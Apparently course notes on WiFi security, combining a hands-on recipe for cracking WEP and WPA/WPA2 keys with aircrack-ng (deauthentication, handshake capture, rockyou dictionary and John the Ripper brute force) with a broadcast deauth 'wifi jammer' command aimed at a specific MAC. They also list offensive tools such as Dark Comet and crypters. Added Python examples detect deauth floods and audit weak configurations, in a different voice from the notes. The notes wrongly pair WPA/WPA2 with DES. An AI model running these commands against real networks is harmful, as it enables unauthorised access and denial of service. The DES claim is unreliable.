How Does Wireless Security Work
Why do we need wireless security
free WiFi —> terrorist connects —> sends email —> innocent user gets punished
Wireless security
—————-
Strong password
–> numbers
–> alphabet
–> lowercase
–> upper case
–> special character
@bh!J33T$!NG#
–> Minimum length –> 8 characters
–> Never share your wifi password
–> Frequently change it
–> Disable WPS
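The checklist above can be turned into a passphrase policy check. This is an added example, not code from the notes: it applies the five rules listed (digits, lowercase, uppercase, special character, minimum 8) and additionally enforces the 8 to 63 printable-ASCII bound that IEEE 802.11i places on WPA/WPA2 passphrases, then gives a rough strength estimate.

```python
import math
import string

# Rules from the checklist above: digits, lowercase, uppercase, special character,
# minimum length 8. The 8..63 printable-ASCII bound is the WPA/WPA2 passphrase
# limit from IEEE 802.11i; it is added here and not stated in the notes.
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63
WHITESPACE_NOT_ALLOWED = "\t\n\r\x0b\x0c"

# Character classes used both for the rule check and the pool-size estimate.
CLASSES = {
    "digit": set(string.digits),
    "lowercase": set(string.ascii_lowercase),
    "uppercase": set(string.ascii_uppercase),
    "special": set(string.punctuation),
}


def check_passphrase(pw: str) -> list:
    """Return the list of failed rules; an empty list means the passphrase passes."""
    failures = []
    if len(pw) < WPA_MIN_LEN:
        failures.append(f"shorter than {WPA_MIN_LEN} characters")
    if len(pw) > WPA_MAX_LEN:
        failures.append(f"longer than {WPA_MAX_LEN} characters (WPA passphrase limit)")
    if any(c not in string.printable or c in WHITESPACE_NOT_ALLOWED for c in pw):
        failures.append("contains non-printable or non-ASCII characters")
    for name, chars in CLASSES.items():
        if not any(c in chars for c in pw):
            failures.append(f"no {name} character")
    return failures


def estimate_bits(pw: str) -> float:
    """Rough strength estimate: log2(pool) per character, where the pool is the
    union of the character classes actually used. Assumes every character was
    chosen at random, so a dictionary word scores far higher than it deserves;
    treat the result as an upper bound, never as proof of strength."""
    pool = sum(len(chars) for chars in CLASSES.values() if any(c in chars for c in pw))
    return len(pw) * math.log2(pool) if pool else 0.0


if __name__ == "__main__":
    for candidate in ("@bh!J33T$!NG#", "password", "Ab1!"):
        print(candidate, check_passphrase(candidate) or "OK", round(estimate_bits(candidate), 1))
```

The sample password from the notes passes every rule, while "password" fails three of them even though it meets the length minimum.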
WiFi –> IEEE 802.11 –> Set of rules
WiFi Encryption
—————
WEP –> RC4
WPA/WPA2 –> DES/AES
DES –> Data Encryption Standard
AES –> Advanced Encryption Standard
Step 1: To start the monitor mode
Step 2: To start gathering information about the wireless signals
Step 3: To start capturing the packets
Step 4: Cracking the WiFi password
Cracking WEP encryption
=======================
> airmon-ng start wlan0
kill processes
> airodump-ng wlan0mon
> airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wepcap wlan0mon
--bssid –> router's mac address
-c –> channel number
-w –> to write/capture packets
> aircrack-ng wepcap-01.cap
Cracking WPA/WPA2
> airmon-ng start wlan0
kill processes
> airodump-ng wlan0mon
> airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wepcap wlan0mon
--bssid –> router's mac address
-c –> channel number
-w –> to write/capture packets
> aireplay-ng -0 10 -a <bssid of router> -c <bssid of user> wlan0mon
-0 –> deauthentication packet
-a –> mac of target router
-c –> mac of any connected client
Dictionary attack
–> rockyou.txt –> /usr/share/wordlists/rockyou.txt
> aircrack-ng filename -w <pathOfDictionary>
Brute Force
–> John the ripper
> john --stdout --incremental | aircrack-ng -e "dlink-FA0C" -w - test001-01.cap
wifi jammer
———–
aireplay-ng -0 0 -a C0:A0:BB:F4:FA:0C -c FF:FF:FF:FF:FF:FF wlan0mon
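Both the targeted deauthentication above (aireplay-ng -0 against one client) and the broadcast "jammer" form show up on the air as bursts of deauth frames, which is what a wireless IDS keys on. The detector below is an added example, not code from the notes or from the aircrack-ng suite: it runs over a constructed list of frame records (timestamp, subtype, source, destination, BSSID; the addresses are made up) and raises an alert for a BSSID when more than a threshold of deauth frames arrive inside a sliding one-second window.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "00:11:22:33:44:55"          # constructed, not a real BSSID
CLIENT = "aa:bb:cc:dd:ee:01"      # constructed client address

# Constructed management-frame records as a monitor-mode sensor might emit them:
# (timestamp_s, subtype, src_mac, dst_mac, bssid). Two normal beacons, then a burst
# of 12 broadcast deauths spoofed from the AP address within 0.6 s, then one
# isolated unicast deauth such as an AP legitimately sends when a client times out.
FRAMES = [(0.0, "beacon", AP, BROADCAST, AP), (0.1, "beacon", AP, BROADCAST, AP)]
FRAMES += [(1.0 + i * 0.05, "deauth", AP, BROADCAST, AP) for i in range(12)]
FRAMES += [(5.0, "deauth", AP, CLIENT, AP)]


def detect_deauth_floods(frames, window_s=1.0, threshold=5):
    """Flag a BSSID the first time more than `threshold` deauth frames are seen
    within any sliding window of `window_s` seconds. Both patterns from the notes
    are caught: repeated unicast deauths aimed at one client and broadcast deauths
    aimed at everyone. Returns {bssid: {"first": ts, "count": n, "broadcast": bool}}."""
    recent = defaultdict(deque)   # bssid -> deque of (timestamp, was_broadcast)
    alerts = {}
    for ts, subtype, src, dst, bssid in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        q = recent[bssid]
        q.append((ts, dst == BROADCAST))
        while q and ts - q[0][0] > window_s:   # drop frames older than the window
            q.popleft()
        if len(q) > threshold and bssid not in alerts:
            alerts[bssid] = {"first": q[0][0], "count": len(q),
                             "broadcast": any(b for _, b in q)}
    return alerts


if __name__ == "__main__":
    for bssid, info in detect_deauth_floods(FRAMES).items():
        kind = "broadcast" if info["broadcast"] else "targeted"
        print(f"deauth flood against {bssid}: {info['count']} frames since t={info['first']}s ({kind})")
```

The single deauth at t=5 s never trips the detector, which is the point of using a rate over a window rather than alerting on every deauth frame.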
airmon-ng
———
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. It can also list/kill programs that can interfere with the wireless card operation.
airodump-ng
———–
airodump-ng is used for packet capturing of raw 802.11 frames for the intent of using them with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng is capable of logging the coordinates of the found access points. Additionally, airodump-ng writes out a text file containing the details of all access points and clients seen.
Beacons –> Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
#Data –> Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
#/s –> Number of data packets per second measured over the last 10 seconds.
CH –> Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
MB –> Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is supported. 'e' indicates that the network has QoS (802.11e) enabled.
ENC –> Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
CIPHER –> The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater than 0. The standard states that the index can be 0-3 for 40-bit and should be 0 for 104-bit.
AUTH –> The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
WPS –> This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates the version supported. The second field indicates WPS config methods (can be more than one method, separated by comma): USB = USB method, ETHER = Ethernet, LAB = Label, DISP = Display, EXTNFC = External NFC, INTNFC = Internal NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD = Keypad. Locked is displayed when AP setup is locked.
ESSID –> The so-called "SSID", which can be empty if SSID hiding is activated. In this case, airodump-ng will try to recover the SSID from probe responses and association
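The ENC, CIPHER, AUTH and ESSID fields described above are what a defender reads first when auditing their own airspace for weak configurations. The script below is an added example, not part of the notes or of the aircrack-ng suite: it parses a constructed airodump-ng style AP table (made-up MACs and ESSIDs, laid out in the column order described above) and reports, per BSSID, the weaknesses those fields reveal (open, WEP, TKIP, shared-key auth, passphrase-only PSK, hidden SSID).

```python
import re

# Constructed airodump-ng style AP rows (not a real capture; MACs and ESSIDs are made
# up) in the column order explained above: BSSID PWR Beacons #Data #/s CH MB ENC CIPHER
# AUTH ESSID. CIPHER/AUTH are blank for OPN and "WEP?" rows, hidden SSID prints as
# "<length:  0>", both as in real output.
SAMPLE = """\
 00:11:22:33:44:01  -40      120       15    0   6  54e. WPA2 CCMP   PSK  HomeNet
 00:11:22:33:44:02  -55       80      900    3  11  54   WEP  WEP         OldRouter
 00:11:22:33:44:03  -61       33       40    0   1  54e  WPA  TKIP   PSK  Legacy AP
 00:11:22:33:44:04  -70       12        2    0   6  54e  OPN              Cafe Free
 00:11:22:33:44:05  -48       95       60    1  36  54e  WPA2 CCMP   MGT  Corp
 00:11:22:33:44:06  -75        9        5    0   6  54   WEP?             <length:  0>
"""

ROW = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<pwr>-?\d+)\s+(?P<beacons>\d+)"
    r"\s+(?P<data>\d+)\s+(?P<ps>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\S+)"
    r"\s+(?P<enc>OPN|WEP\??|WPA2?|WPA3)"
    r"(?:\s+(?P<cipher>CCMP|WRAP|TKIP|WEP40|WEP104|WEP))?"
    r"(?:\s+(?P<auth>MGT|SKA|PSK|OPN))?\s+(?P<essid>.*?)\s*$")


def parse_table(text):
    """Parse AP rows into dicts; lines that do not look like AP rows are skipped."""
    return [m.groupdict() for m in map(ROW.match, text.splitlines()) if m]


def audit_row(row):
    """Weaknesses a defender should act on, derived from ENC/CIPHER/AUTH/ESSID."""
    enc, cipher, auth, essid = row["enc"], row["cipher"], row["auth"], row["essid"]
    findings = []
    if enc == "OPN":
        findings.append("OPN: no encryption, all traffic readable on air")
    elif enc == "WEP?":
        findings.append("WEP?: too few frames to tell WEP from WPA, re-check before reporting")
    elif enc == "WEP":
        findings.append("WEP: RC4 with weak IVs, key recoverable from captured data frames")
    elif cipher == "TKIP":
        findings.append("TKIP: RC4-based WPA1 cipher, migrate to WPA2/CCMP")
    if auth == "SKA":
        findings.append("SKA: shared-key auth is WEP-only and weaker than open-system auth")
    if auth == "PSK" and enc.startswith("WPA"):
        findings.append("PSK: strength rests entirely on the passphrase (dictionary attacks)")
    if essid.startswith("<length"):
        findings.append("hidden SSID: no protection, recovered from probe/association frames")
    return findings


def audit(text):
    """Map each BSSID in an airodump-ng table to its list of findings."""
    return {row["bssid"]: audit_row(row) for row in parse_table(text)}
```

Only the WPA2/CCMP network with MGT (802.1X) authentication comes back with an empty findings list; every other row in the sample has at least one item to fix.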
aircrack-ng
———–
aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.
It can recover the WEP key once enough encrypted packets have been captured with airodump-ng.
This part of the aircrack-ng suite determines the WEP key using two fundamental methods. The first method is via the PTW approach (Pyshkin, Tews, Weinmann). The main advantage of the PTW approach is that very few data packets are required to crack the WEP key. The second method is the FMS/KoreK method. The FMS/KoreK method incorporates various statistical attacks to discover the WEP key and uses these in combination with brute forcing.
Additionally, the program offers a dictionary method for determining the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist (file or stdin) or an airolib-ng has to be used.
aireplay-ng
———–
aireplay-ng is used to inject/replay frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection. With the packetforge-ng tool it's possible to create arbitrary frames.
Skills
——
Bypassing OS Login
System Protection/PT
Malware Protection
Information Gathering
Social Engineering
Email Security
OWASP TOP 10
VA
Wireless Protection
Traffic Monitoring
Mobile Platform Security/PT
WiFi Security/PT
Tools
anonymox
psiphon
hotspot shield
ultrasurf
hiren boot cd
kon boot cd
whoislookup
dnslookup
maltego
dark comet
urge cryptor
chrome cryptor
family key logger
syskey
angry ip scanner
xampp server
dvwa
sqlmap
havij
burp suite
mod security
netsparker
acunetix
zap
IBM AppScan
ettercap
xerosploit
bettercap
honeypot
driftnet
urlsnarf
sslstrip
netdiscover
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
john the ripper